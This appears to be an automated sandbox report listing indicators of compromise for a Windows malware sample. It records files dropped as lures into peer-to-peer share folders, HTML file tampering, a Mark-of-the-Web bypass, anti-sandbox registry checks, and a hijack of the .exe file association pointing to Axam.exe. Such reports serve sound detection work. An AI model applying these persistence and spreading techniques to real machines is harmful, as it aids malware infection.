File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\1033\MCABOUT.HTM	WScript.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2020.503.58.0_x64__8wekyb3d8bbwe\LensSDK\Assets\ThirdPartyNotices\ThirdPartyNotices.html	WScript.exe
File created	C:\Program Files (x86)\Grokster\My Grokster\XXX_HOTSEX.exe	Axam.exe
File created	C:\Program Files (x86)\Morpheus\My Shared Folder\Blaster.exe	Axam.exe
File created	C:\Program Files (x86)\Grokster\My Grokster\XXX_HOTSEX.exe	Axam.exe
File created	C:\Program Files (x86)\KMD\My Shared Folder\Axam.exe	Axam.a.exe
File created	C:\Program Files (x86)\BearShare\Shared\fxbgbear.exe	Axam.exe
File created	C:\Program Files (x86)\BearShare\Shared\fxbgbear.exe	Axam.exe
File created	C:\Program Files (x86)\BearShare\Shared\fxbgbear.exe	Axam.exe
File created	C:\Program Files (x86)\KMD\My Shared Folder\Axam.exe	Axam.exe
File created	C:\Program Files (x86)\Edonkey2000\Incoming\setup_flash.exe	Axam.exe
File created	C:\Program Files (x86)\Grokster\My Grokster\XXX_HOTSEX.exe	Axam.a.exe
File created	C:\Program Files (x86)\BearShare\Shared\fxbgbear.exe	Axam.exe
File created	C:\Program Files (x86)\Morpheus\My Shared Folder\Blaster.exe	Axam.exe
File created	C:\Program Files (x86)\Morpheus\My Shared Folder\Blaster.exe	Axam.exe
File created	C:\Program Files (x86)\Morpheus\My Shared Folder\Blaster.exe	Axam.exe
File created	C:\Program Files (x86)\KMD\My Shared Folder\Axam.exe	Axam.exe
File created	C:\Program Files (x86)\KMD\My Shared Folder\Axam.exe	Axam.exe
File created	C:\Program Files (x86)\Morpheus\My Shared Folder\Blaster.exe	Axam.exe
File created	C:\Program Files (x86)\Morpheus\My Shared Folder\Blaster.exe	Axam.exe
File created	C:\Program Files (x86)\Edonkey2000\Incoming\setup_flash.exe	Axam.exe
File created	C:\Program Files (x86)\BearShare\Shared\fxbgbear.exe	Axam.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\view.html	WScript.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\offset_window.html	WScript.exe
File created	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.6.3102.0_x64__8wekyb3d8bbwe\Microsoft.Advertising\bootstrap.html	WScript.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\ReadMe.htm	WScript.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\license.html	WScript.exe
File created	C:\Program Files (x86)\Grokster\My Grokster\XXX_HOTSEX.exe	Axam.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\mobile.html	WScript.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\mobile_browse.html	WScript.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-o..documents.resources_31bf3856ad364e35_10.0.22000.184_fr-ca_a893ab33a8408052\f\OOBE_HELP_Opt_in_Details.htm	WScript.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\core\view\oobe-progress-template.html	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.176_none_fded9bd0d2f09976\f\oobelocalaccount-main.html	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.469_none_fdfb724cd2e5c0ff\hololensWorkAccount.html	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.469_none_fdfb724cd2e5c0ff\oobeupdatesettings-main.html	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.22000.1_de-de_09db7b35a423b804\403-11.htm	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.22000.1_en-us_b2cc512e9301c3c9\403-13.htm	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.22000.1_es-es_b297ae129328b56e\431.htm	WScript.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\webapps\inclusiveOobe\view\oobesettings-multipage-main.html	WScript.exe
File created	C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\webapps\inclusiveOobe\view\oobehello-main.html	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.469_none_fdfb724cd2e5c0ff\oobe-toggle-template.html	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.22000.1_en-us_b2cc512e9301c3c9\404-9.htm	WScript.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\core\view\oobeFooterHost.html	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.469_none_fdfb724cd2e5c0ff\OEMRegistration.html	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.22000.1_de-de_09db7b35a423b804\403-2.htm	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.22000.1_es-es_b297ae129328b56e\401-4.htm	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.22000.1_ja-jp_e19c99655047c329\404-12.htm	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.22000.120_none_bb415867ae85d51c\debugger.html	WScript.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\webapps\inclusiveOobe\view\oobelocalngc-main.html	WScript.exe
File created	C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\webapps\inclusiveOobe\view\templates\oobe-footer-template.html	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.469_none_fdfb724cd2e5c0ff\retailDemoShutdowns.html	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.22000.1_es-es_b297ae129328b56e\404-11.htm	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.22000.1_fr-fr_554f241185facbd0\401-2.htm	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.22000.1_ja-jp_e19c99655047c329\403-6.htm	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.22000.1_ja-jp_e19c99655047c329\404-14.htm	WScript.exe
File created	C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-management-oobe_31bf3856ad364e35_10.0.22000.71_none_5465725c68e2919e\f\autopilotwhitegloveresult-main.html	WScript.exe
File created	C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-management-oobe_31bf3856ad364e35_10.0.22000.71_none_5465725c68e2919e\f\oobeprovisioningprogress-main.html	WScript.exe
File created	C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\f\webapps\guidedsetup\network\index.html	WScript.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\webapps\AntiTheft\views\OobeAntiTheft-main.html	WScript.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\webapps\inclusiveOobe\view\oobeautopilotreboot-main.html	WScript.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\webapps\inclusiveOobe\view\oobecortana-main.html	WScript.exe
File created	C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\webapps\inclusiveOobe\view\templates\oobe-button-template.html	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.176_none_fded9bd0d2f09976\unifiedEnrollmentFinished.html	WScript.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\webapps\inclusiveOobe\view\oobeactivitysyncconsent-main.html	WScript.exe
File created	C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\webapps\templates\view\common-footer-template.html	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.469_none_fdfb724cd2e5c0ff\f\oobeupdatesettings-main.html	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.22000.1_es-es_b297ae129328b56e\403-14.htm	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.22000.1_es-es_b297ae129328b56e\404-4.htm	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.22000.1_fr-fr_554f241185facbd0\405.htm	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.22000.1_it-it_3f771a585d2cb14e\403-7.htm	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.22000.120_none_bb415867ae85d51c\memoryAnalyzer.html	WScript.exe
File created	C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-o..documents.resources_31bf3856ad364e35_10.0.22000.184_lt-lt_839fdef3524da438\f\OOBE_HELP_Opt_in_Details.htm	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.176_none_fded9bd0d2f09976\retailDemoLocal.html	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.176_none_fded9bd0d2f09976\retailDemoSecurity.html	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.22000.1_de-de_09db7b35a423b804\403-7.htm	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.22000.1_fr-fr_554f241185facbd0\413-1.htm	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.22000.1_it-it_3f771a585d2cb14e\403-10.htm	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.22000.1_it-it_3f771a585d2cb14e\500-15.htm	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.22000.1_ja-jp_e19c99655047c329\403-9.htm	WScript.exe
File created	C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-management-oobe_31bf3856ad364e35_10.0.22000.71_none_5465725c68e2919e\f\oobeenterpriseprovisioning-main.html	WScript.exe
File created	C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-o..documents.resources_31bf3856ad364e35_10.0.22000.184_cs-cz_ca4442aac974b5c7\f\oobe_learn_more_activity_history.htm	WScript.exe
File created	C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-o..documents.resources_31bf3856ad364e35_10.0.22000.184_fr-fr_b01d60e9a3681a2c\f\oobe_learn_more_activity_history.htm	WScript.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\core\view\sspr-frame-template.html	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.22000.1_de-de_09db7b35a423b804\404-4.htm	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.22000.1_it-it_3f771a585d2cb14e\403-11.htm	WScript.exe
File created	C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-o..documents.resources_31bf3856ad364e35_10.0.22000.184_it-it_9a4557307a99ffaa\f\OOBE_HELP_Opt_in_Details.htm	WScript.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\RetailDemo\retailDemoSecurity.html	WScript.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\webapps\inclusiveOobe\view\oobedevicepairing-main.html	WScript.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\webapps\inclusiveSspr\view\ssprerror-main.html	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.469_none_fdfb724cd2e5c0ff\oobeprovisioningentry-main.html	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.469_none_fdfb724cd2e5c0ff\retailDemoAdmin.html	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-c..st.appxmain.desktop_31bf3856ad364e35_10.0.22000.120_none_847a376149211bf5\f\oobeaadcageconfirmation-main.html	WScript.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.22000.1_fr-fr_554f241185facbd0\403-17.htm	WScript.exe
File created	C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\f\Cortana.UI\cache\Local\Desktop\2.html	WScript.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\{621F963D-5F49-419A-991E-C4E2C68F68AA}\8tr.exe:Zone.Identifier	WINWORD.EXE

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1416	3496	WerFault.exe	143

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Remcos.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Axam.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Axam.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Axam.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Axam.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Axam.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Axam.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Axam.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Axam.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Axam.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WarzoneRAT.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Axam.a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Axam.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Userdata.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Axam.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Axam.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Axam.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Axam.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5580	PING.EXE

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 18 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Roaming\\Axam.exe \"%1\" %*"	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\DefaultIcon\ = "%1"	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "Spitmaxa"	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\shell\open\command	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\DefaultIcon\ = "%1"	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\DefaultIcon	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\DefaultIcon\ = "%1"	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\DefaultIcon	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\DefaultIcon\ = "%1"	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\shell\open\command	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-501547156-4130638328-323075719-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe	Axam.a.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\shell\open\command	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\DefaultIcon	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\DefaultIcon	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Roaming\\Axam.exe \"%1\" %*"	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Roaming\\Axam.exe \"%1\" %*"	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Roaming\\Axam.exe \"%1\" %*"	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\shell	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\DefaultIcon	Axam.a.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe	Axam.exe
